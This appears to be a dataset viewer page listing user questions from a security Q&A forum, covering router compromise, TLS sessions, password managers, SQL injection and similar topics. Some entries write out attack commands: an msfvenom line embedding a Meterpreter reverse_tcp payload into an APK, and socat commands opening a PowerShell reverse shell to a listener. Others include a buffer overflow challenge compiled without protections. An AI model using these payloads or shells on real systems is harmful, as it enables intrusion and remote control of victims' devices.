instruction stringlengths 24 29.9k |
|---|
An ex-girlfriend has demonstrated an ongoing ability to access files stored only on my Windows 10 x64 PCs and Microsoft OneDrive. How can I find or trace the mechanism by which she is doing this? Details:
Months ago, before we broke up, she had both unsupervised physical access to one of the PCs and admin access bef... |
I use Parrot OS security.
When i was listing the contents in my root dir i noticed some weird file names that end with .Kismet.
I know that kismet is a network intrusion detection software which is also used for wifi sniffing etc... But i never installed or used it.
Here are the suspicious files:
Kismet-20200404-18-30-... |
Hi guys,
I just started using bitwarden as a password manager and stumbled across a very confusing feature...
When I enable the password autofill feature (I know it's called auto fill..but still...) I don't even have to type in my password or fingerprint to go to my vault and see my password in plaintext or just logi... |
Why would a client send a TLS session ID (96b839ce3aadb65780923d28a3e7e767fc5bddc507884a7e70e506d8b85a06d3 on its first visit to a server/website? My understanding is that the client would include a session ID in the ClientHello message to indicate to the server that wants to resume a previous session. However, this wo... |
I am writing my master's thesis about WLANs, and there is something what I don't really understand. This may be a dumb question but I didn't find a clear explanation.
WPA uses encryption TKIP. WPA2 uses encryption AES. So far so good. What I don't understand is, that during my research I found a lot of articles describ... |
I use Debian stretch and Bind 9.10.3 as my DNS server.
Today I saw the following entry in my log file:
Apr 17 23:04:22 ns named[111]: client 45.83.65.112#48974 (localhost): transfer of 'localhost/IN': AXFR started (serial 2)
Apr 17 23:04:22 ns named[111]: client 45.83.65.112#48974 (localhost): transfer of 'localhost/IN... |
Let's say I want to charge a user's credit card with their permission after a sale takes place. But, I don't want to have to ask them their credit card a second time.
Is it legal to store the credit card information as they're filling it out on the checkout, for say 6 hours or something, on a PCI compliant data store, ... |
I got a question.
What would be preferred more secure option for managing computers.
Using local admin accounts with LAPS, password changed every 24hrs
Or Domain Joined account that is member of local Administrator group on each computer.
The tasks that would performed is deployment of software remotely.
Thx
|
I was considering developing an application level software for file encryption after stress testing many of my implementations of popular symmetric ciphers. I would love to support multiple algorithms like AES (GCM / CBC/ CTR) , XChaCha20-Poly1305 etc. But I'm at a crossroads when choosing a highly recommended symmetr... |
with school computers can the school track what apps you are using without being connected to that schools WiFi?
|
I want to embed a payload to an apk file. I tried to use the msfvenom -x ScreenBrightness.apk -p android/meterpreter/reverse_tcp LHOST=<my_ip> LPORT=4444 R > output.apk
And this was the output:
Using APK template: ScreenBrightness.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payloa... |
I made an experimental AV application to detect some test files as malware. It uses a simple signature based detection to detect those files. When my test AV encounters a file, it computes the SHA256 hash of that file, and then compares it with a database of hashes that are "deemed" malware. It will then either quaran... |
I'm designing a protocol over the SSL but I faced a challenge. In the network each user takes a private key from authority. I want to just the owner can use his/her the private key. there are two situations:
the owner gives his/her private key to another or
the owners device will compromise and the hacker steals his/h... |
Can an android app steal a stored password from any other app I have installed?
Say I have snapchat and I only log in once and stay logged in, if I later delete the cache from that app it will log me out.
Are the stored passwords vulnerable?
|
How does a whole asset fail a CIS benchmarks assessment?
I am using Rapid7's InsightVM tool to run CIS scans on couple of our servers. One of them reported 68.27% compliance, while the other scored close too. However, in the summary of the asset, it has marked the status of the asset as 'Failed'. Is there a minimum com... |
Why Mozilla Thunderbird configured to access Yahoo IMAP server, uses a private IP address, even if there is no other device in the network. Every time, Thunderbird is restarted, it changes remote-host IP address in the range of 10.0.0.0/8. Further, the personal firewall has no log showing communication with any private... |
the use case I have is, there are multiple systems that access each other over the internet, all sharing the same user base. openId connect seems to be the way of identity management. this means every system would need user/ resource owner authorization to access the users' resources on other systems. But I'd like to s... |
I have signed up with a new current account in the UK for day-to-day transactions. The account comes with a payment (debit) card. The banking institution's security handling of PINs for payment cards is something that I think would be interesting for an audience of security professionals, and I wonder if it is not good... |
I have a (maybe dumb) question for you. I was wondering if there is a way to know if my router has been hacked.
I secured it the best that I can and also made it so only the mac addresses of the devices that I know can access my WiFi.
I turned off uspn, WPS, and remote access to the router settings even though I noti... |
In my MacBook Air, whenever I search something in google, some adds are appearing out of no where and they're hiding the actual search results from google. When I checked the developer tools, I found that they were coming from a http request to findsearchresults.info which is being called from another js file from hugo... |
If a Linux server only open SSH port 22 and HTTP port 80, must we go through one of these two ports to hack into server from the internet?
|
I run QubesOS on my laptop and created a StandaloneVM based on debian-10 template.
I installed metasploit and created a database for the MSF web service and I was given a token for the API.
I rebooted my laptop and then when I type msfconsole again it asks me to create a user again.
user@offsec:~$ msfconsole
Found a da... |
Lately I am seeing multiple daily 404s for variations of "license.txt", e.g., "wordpress/license.txt", "blog/license.txt", "old/license.txt", "new/license.txt". Here's a little snippet of slightly redacted logfile to illustrate:
5.189.164.217 - - [17/Apr/2020:11:12:30 -0700] "GET [redacted]/wordpress/license.txt HTTP/1... |
If an abstract unix socket is named "\0some random secret", can it be guessed or retrieved somehow from the abstract socket namespace beyond using brute force?
Are there more security related downsides compared to normal unix sockets which is subject to file system access control?
|
I read about a couple of layer 2 protections against dhcp starving, mac and ip spoofing- ip guard, dhcp snooping and dynamic arp inspection.
Are there any cons or vulnerabilies which enable bypassing them or are they safe to use?
I have noticed that each record in the dhcp binding table has a time to live and the tabl... |
I have an app that revolves entirely around Spotify. I have followed the authorization guide from Spotify and am using the Authorization Code Flow so the access token can be refreshed. My thinking was that this will prevent them from having to log back into Spotify each time they return to the app, but I'm not sure how... |
In sensor nodes, there arises a need to store the master secret key safely. Which is the most perfect location to store the key when the sensor nodes (such as implanted body sensor node) are highly resource-constrained ones?
|
//update 1 - there came some good replies (sadly mostly as comments instead of direct answers) - look further down for additional edit
I know this is a hot topic for the past few years, and although I would say I know quite some stuff about transport encryption (from the client to the server) I didn't yet got what's al... |
Windows can protect sensitive data using CryptProtectData, which according to the Windows docs, encrypts data for a given program using the user's login password.
But Windows 10 has several forms of login: Windows Hello Face, Windows Hello Fingerprint, Windows Hello PIN, Security Key, Password and Picture Password.
W... |
If I encrypt, say, a .pdf file then does knowing that it's a .pdf make it easier to decrypt?
i.e. could the file's well-known structure act as a predictable part of the encrypted bytes?
|
I am attempting to encrypt some passwords by hand to use in a project with JtR. Unfortunately, the program is having difficulty recognizing the hash types of the passwords after hashing them.
Currently, based on the information found here:
John the ripper does not crack password
my process is to encrypt a password via... |
Unfortunately my iPad was recently stolen and I had LastPass installed on it. Both the iPad and the app are protected with TouchID and passcodes. However, LastPass keeps an encrypted offline cache of the passwords and other stuff including secure notes for bank accounts and cards, etc. I understand that it should be ve... |
I'm sure everybody knows the e-mails that many web services send out when you log into your account from an unknown device or geo-location to inform you about suspicious login activity.
The problems start as soon as one doesn't attempt the login him-/herself and this mail could actually indicate that some adversary tri... |
I am learning SQLi using sqlmap and xampp.
I set up my lab the same way as per tutorial but when I run
sqlmap.py -u "http://localhost/bwapp/sqli_1.php?title=1*"
the error got 302 redirected to
http://localhost:80/bwapp/login.php
and when I clicked either yes or no, then I get the error
"you have not declared cooki... |
If we have data stored in encrypted format by the android app (encryption key in keystore), is it possible for the app to be the only entity capable of decrypting it to do some calculations? I am talking even the app's own user can't access the decrypted data, not even when not using the app UI to access the app like h... |
I recently started learning about pentesting, and I tried to see the request body of a website that I use frequently, and that's what I saw:
("senha" means "password" in portuguese and "entrar" means "to enter"). My question is: Is this a correct approach? I mean, can someone intercept this data and get my password? A... |
I was wondering what to do if by any chance I got infected with a Ransomware that could trick my AV suite, and my conclusion is that a complete memory dump would be the best option, as probably the encryption key would be there somewhere.
Searching online only showed me how to get the memory dumped on error, BSOD and t... |
I am making a Java Project a LAB MONITORING SYSTEM for my University practical exams. Where a teacher or admin can monitor some selected computers and can give permissions to what the user at that computer can do.
One application is deployed at the admin computer and one application is deployed at the client computer (... |
I've been reading about password managers recently out of personal interest, however since I don't have any experience in the area of information security, I found myself confused about two aspects after watching the following Computerphile video.
Let's say I download and set up one of the commercially available passwo... |
I've recently tried to work with the Signal protocol, but the documentation isn't great. I've come across a problem where the messages being sent include the pre key because the client has unacknowledged pre key messages even if a session has already been established. I've checked the source code of the Java client, bu... |
Theoretically? (If no, why? And if yes, why hasn't it been done?)
|
As far as I know, there is a table of files present in the hard drive that does not contain the data of each file but can point you to it.
When you delete a file, the record of it gets deleted from the file table, but the data remains on the computer.
So the question is: If you overwrite a file's data with, let's say, ... |
I have these 2 different encrypted texts
+j+hnQx9Wl83MWeM92tyZA==
and
E4NEi092gWbppbpNR0JUAw==
They should both be long numbers, like 19732832, but I don't know how to decrypt them. Does anyone know how to help me? I would be very glad if anyone could tell me either the encryption method or just the decrypted ... |
This question is specific to the Apple/Google Contact Tracing framework. See https://www.blog.google/documents/56/Contact_Tracing_-_Cryptography_Specification.pdf for the cryptography spec.
In this spec, note the Rolling Proximity Identifier (RPI) is generated from the Daily Tracing Key and the TIN using HMAC.
My under... |
Problem Statment
I am trying to guard against the following scenario.
I have a laptop and it connects over wifi, at home as well as at the workplace.
I am not familiar with the wifi protocol.
I however have some understanding of how it may happen - there is some sort of a device-identifier (I am guessing it looks like ... |
I've read that socat is capable of creating interactive shells. I'd like to create an interactive Powershell shell.
Kali Listener
# socat - tcp4-listen:1338
Windows (socat.exe used from here: https://github.com/StudioEtrange/socat-windows)
socat.exe tcp-connect:192.168.33.131:1338 exec:powershell.exe,pipes,pty
I get ... |
So I made a simple buffer overflow challenge and attempted to host it on a digitalocean droplet. The challenge source is below, and is compiled using gcc welcome.c -fno-stack-protector -no-pie -o welcome.
#include <unistd.h>
#include <stdio.h>
int main(void) {
setvbuf(stdout, NULL, _IONBF, 0);
char name[25];
... |
Let me first start by stating that I am by no means a webdeveloper, so please do point out if I'm going in the wrong somewhere in my story.
I think most people agree with the idea that using prepared statements effectively stops injections if executed properly. With that said, in order to write prepared statements in P... |
We received an "abuse report" from AWS indicating we may have experienced a DDOS attack. From what i could see there was definitely some spikes in the last two days. According to AWS it was through port 80 (HTTP/WEB) which we need. To be honest this is not very frequent. However i just wanted to take in some suggestion... |
According to Arun on StackOverflow “Starting Chrome 80 version, cookies are encrypted using the AES256-GCM algorithm, and the AES encryption key is encrypted with the DPAPI encryption system, and the encrypted key is stored inside the ‘Local State’ file.”. (https://stackoverflow.com/questions/60230456/dpapi-fails-with-... |
Long ago, I used to do SQL queries like:
SELECT * FROM table WHERE id = ' . attempt_to_escape($_GET['id']) . ' ORDER BY timestamp DESC LIMIT 1;
This was horribly scary and I probably messed it up by using/not using quotes or not checking the character encoding properly and a thousand other things. SQL injections. I ca... |
$input = $_GET['user_name'];
echo(remove_xss($input));
remove_xss($input){
convert $input to lowercase
remove all "script"
remove all double and single quotes
remove all img, iframe, onclick, body, svg, button, div, video
remove all equal-to signs
}
|
I've already cracked a PDF with pdf2john but it doesn't show the password. What could be the problem? (The password isn't blank.)
|
Let us say, we open a port, say port 123, so that upon listening, an application on the server can receive incoming packets through the port 123.
If there is no way that an inside application on the server listens the port 123, how can an attacker use this open port to attack the server?
|
Algolia allows you to generate virtual/secured API keys from another parent API key but without a call to their servers.
A virtual key thus generated on the server side with a defined "scope" (like a pre-defined user filter), can be exposed on the JS client and guarantees that API calls made using that virtual key are... |
When users try to log in to my web application they have two options: their username or their email including password, both of them are unique.
When the logged-in user tries to write comments in the public comment box, shall I post his/her username as a name or ask them to write their name? What can I do for better s... |
This is probably a massive noob question, but Google results aren’t being helpful and I couldn’t find something specific here.
I made this server that just hosts IRC, HTTP and SSH for some friends. I have done this sort of thing before, and to my knowledge everything was fine. But today, minutes after I turn boot up th... |
A website reflects the parameter I send, but the user input is accepted in the form of string.
Hence whatever I search is reflected as
<meta property="og:title" content="hello _userinput_ to xyz" />
in the source code.
I tried to end the string sequence with " but the " character is filtered using "
So the above c... |
I had recently started using the nmap --script vuln option and I did try it on my own local router IP, which then crashed and we had to restart (coincidence?).
Then today I wanted to try it again, and (probably against my best judgement) I did nmap -Pn --script vuln <the website> and while it was running I thought I sh... |
Someone or "something" is trying to access the server.
my postfix log showed:
mx2 postfix/smtpd[*****]: lost connection after MAIL from unknown[127.0.0.1]
My concern is why is it from the localhost? and I just can't figure it out with "after MAIL" means.
|
I'm running a company web application in AWS. This web app is behind a cognito+External Identity provider with SAML for only allowing company employees to reach the app (then they log in with local credentials to the app, as it is not possible to use SAML).
In this context, does it make sense to put a WAF? A potential ... |
Which is the proper way to prevent users to read sensible information stored inside an IoT device (e.g. source code / private keys...)?
Fully disk encryption is of course an option, but is it possible to boot the device without asking the user for a password?
How do operating systems like Ubuntu Core handle these secur... |
If I have a webapplication in my internal Microsoft Windows network I'm aware that I can use the kerberos protocol to make a Single Sign on (SSO) into this application with the web browser.
Is it a good idea to use kerberos for SSO in an external hosted and run (think SaaS) webapplication when all clients of this appli... |
I have a microservice app. hub.example.com handles authentication. When a users logs in, I need to set a cookie on learn.example.com What is a secure way to set this? I'm aware of a few approaches:
hub sets the cookie on example.com This works, but the cookie propagates to other subdomains. Also a risky subdomain like... |
Assume we build an application that has internal components (or microservices) on GCP (or AWS, Azure...).
I guess there are 2 main security options:
use VPC to protect internal communications.
use service account-based authentication and encryption between each internal components.
Of course, we still could apply ... |
Further, does an unused OTP expire by itself? i.e in regards to digital banking - in case a hacker accesses your SMS's through malware or other means.
|
If I have a an application server that uses an implementation of JAX-RS, and is running as *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?
My naive understanding is that JAX-RS application are only serving requests to certain URLs and Apache ... |
Let's say I'm running a webserver from home that has port 8080 exposed to the internet. I SSH into that server from another computer on my local network on port 22. If port 22 is not accessible externally, is there a danger to keeping the SSH connection unprotected?
|
Correct me if I'm wrong, but before EMV cards were introduced in the U.S., thieves would use card skimmers on ATMs and point-of-sale (POS) terminals (such as gas pumps) to steal the CVV1, which would allow them to create counterfeit cards and purchase things in stores, but they would still be unable to purchase things ... |
I have a web based application for a network that needs to be able to run without internet access. I have wanted to add TLS to protect certain data in transport. I have explored options like Lets Encrypt and OpenSSL but neither seem truly viable for my situation. Lets Encrypt requires internet access and OpenSSL requir... |
Hope all is well.
I am developing a primarily cloud-based tool that allows the end-user to enter in billing data and task data via a desktop application, and the billing data is stored locally (their account data and the task data is stored on a sever, but there are no issues with that).
They can create, edit, delete, ... |
There is a possibility to download the file with one’s PII from the dedicated web server. The file might be decrypted by filling the two factors. These two factors are delivered via email and SMS. The sum of these factors is the key from which is generated the hash by, let’s say, bcrypt. This hash is the main password ... |
To keep a long story short, I got hacked on my PC by downloading and executing a wrong file. Programs as InterVPN, Cryptobot and HVNC (told by the hacker via google chat) were installed. My accounts (Outlook and Gmail) were taken over.
They used my passwords (stored in Google) to try to log in to a lot of cryptocurrenc... |
If we compare only these two passwords, which one is the safest?
Ss1*x_32 or Very-hard-password-it-is-so-hard-to-break-it-1
The question is not about how many bits every password contains but about statistics, which brute attacks are more common: dictionary or random symbols?
|
Why are stored procedures and prepared statements the preferred modern methods for preventing SQL Injection over mysql_real_escape_string() function?
|
It obviously doesn't connect with any sort of database.
How is this even possible?
|
I was following this Lynda course.
https://www.linkedin.com/learning/ethical-hacking-enumeration/enumerating-smb-from-linux-episode-1
The instructor used this script to detect the OS of the target system.
nmap --script /usr/share/nmap/scripts/smb-os-discovery.nse 192.168.56.3
I have a OWASP box vm and Kali Linux runni... |
I was looking into the DNS-01 challenge of Let's Encrypt, and I had a question about the subdomain process [1].
Let's say, the website example.com gives away free subdomains; what stops me to request a Let's Encrypt wildcard certificate for *.example.com, by claiming the _acme-challenge.example.com subdomain to process... |
I recently looked up some techniques for dumping credentials from LSASS and came across an article that says PPL and other protections were not enabled by default in Windows because some non malicious programs from third parties (including antivirus companies) uses them.
However I was unable to find if actually some pr... |
My network: 192.168.0.1 server. (enp0s3 NAT, enp0s8 internal) 192.168.0.10-15 clients (enp0s3 internal).
I have a proxysquid for blocking websites,and so on.
My clients can navigate and browse any website if no proxy is set at firefox settings, if I set the proxy they can't reach any website but can ping 8.8.8.8
My ipt... |
I'm building a Spring app and a React app which also contains Chat functionality. I use WebSocket with RabbitMQ as message broker.
I store the chat history as encrypted messages with AES, and before I send them to the client, I decrypt them. So I'm wondering if someone could "intercept" the GET request and actually se... |
Suppose I am logging into Gmail by giving my credentials. Does my plaintext get encrypted or is it first converted to the hash and the hash encrypted?
And also if I am communicating to the bank web server and I am doing transactions, is the bunch of packets first converted to a hash and then the hash is encrypted, or ... |
I'm poisoning my home network, I was able to do it 1 time. When i tried several more times to poison the wifi network or the cable network the "target" started to lose connectivity in both cases.
Kernel forwarding is enabled, tried with promisc. mode, the problem is not in the slow processing (CPU load is 20-30%), Th... |
In OAuth2, as part of the authorization request, we generate a random string and pass it with the state parameter, so that when we get the response, we can ascertain that the response is a result of our request.
In some examples, I've seen this generated using normal pseudorandom functions. Would there be any benefit i... |
I have a Swing client that communicates through T3 protocol (RMI) with a Server. Now I want to capture the requests and modify them (like HTTP in Burp or OWASP ZAP).
Is there any attack proxy for RMI/T3 or is the only possibility to use Wireshark?
|
I am hunting for a solution where I can send someone encrypted files and a digital certificate that allows them to open the file.
The reason for doing it this way is because:
I don't want to keep giving them a new password every-time I send
them some newly encrypted files, and they cannot keep up with a password becau... |
You always hear about zero day vulnerabilities in Chrome, Skype, Zoom, Office, VLC, etc. But you never hear about vulnerabilities in video games (like popular multiplayer titles Fortnite or League of Legends) that hackers can use to perform remote zero day attacks on your machine.
Is playing video games like Fortnite o... |
I'm analyzing a pcap via Wireshark, and there are multiple get requests to the IP. These requests use different user agents, which I can't find anything about when I search. The user agents:
CON 1.0 urlexists
VANILLA 1.0 vanillastub
Each get request they use a different range of bytes. Does it mean they are malicious?... |
I "minimally trust" the PHP and PostgreSQL projects to provide non-compromised binaries of their respective programs, which I both depend on. This means that I trust them in the sense that I have no real choice but to trust them.
However, I have well over 100,000 lines of third-party PHP libraries (managed through Comp... |
If I use a database encryption package for oracle like dbms_crypto, would this be vulnerable to any attacks? I know that it uses algorithms like 3DES, AES, etc. These are all thigns that you can use while using this package, and there are attacks against 3DES, and AES but they are relatively secure. Other than a system... |
After scanning my local network with nmap, this host shows up listed as a nmap result but it is the only host that shows on nmap that is not listed as a client on my router list of connected devices.
❯ nmap 192.168.0.xxx -A ... |
A client collects phone numbers through lead form on his website and he is hell-bent on sending WhatsApp instead of email. To build a solution from scratch is out of the question of after some research I came across Wasender, they claim to provide an API just that ([How it Works][1]).
They've got good reviews on the C... |
I've been using Remmina to connect to my RDP server across the internet. When I first connected to the server, I had to accept the certificate. I have not had to do that since the first time I connected.
Now, after using this server for a long time, I get a "Certificate Changed! Details:" alert. It shows the Old Finger... |
I need to build a project for uni where I need to transfer data securely from a client to a server. I can't use PKI structures and can't save pre-shared secrets (Imagine travelling to china and some bad guys check your pc). The only secret is the client's password, which got salted, hashed and saved into the database ... |
I've been read a lot about it, but I'm not 100% sure about it. The most clear response I've found is https://security.stackexchange.com/a/167845/163215
So, according to this, in this scenario:
I have a MacBook connected to a network using wifi, and with Wireshark
installed and capturing in promiscuous mode. In the s... |
My PC running on windows 10 was recently infected with a virus/trojan. I inserted a usb to it at some point , and connected it to my MacBook for clean formatting (I was using my MacBook to wipe it in hopes of getting rid of the virus).
I did not transfer any files from the usb to my MacBook, I have transferred a pdf fi... |
My question is specifically about an option in Google Chrome under Settings > Site Settings > Handlers. I've read in the past that with desktop-based protocol handlers--such as Office Outlook or Thunderbird with mailto: links--an attacker could use a script to compromise Outlook, but can the same thing be said about we... |
I heard that there are some university campus email systems that "click" all the links on incoming emails and thus inadvertently unsubscribe recipients from email distribution lists if the email contains a one-click unsubscribe link. Does this exist? Has anyone had first-hand experience with this from either sender, ca... |
By mistake, I copied and pasted a password into Google Chrome search box on my personal computer, a Mac computer. However, I did not press enter or click search button/magnifying glass. Is my password compromised, should I change it.
Thank you.
|
Situation: My phone is an android (Samsung Galaxy s6) - In a moment of mindless distraction yesterday I opened a pdf in a phishing email - it did contain a link but I did not click it. Very shortly afterwards, I went to Facebook and it had logged me out, which it never does. This made me suspicious that there was indee... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.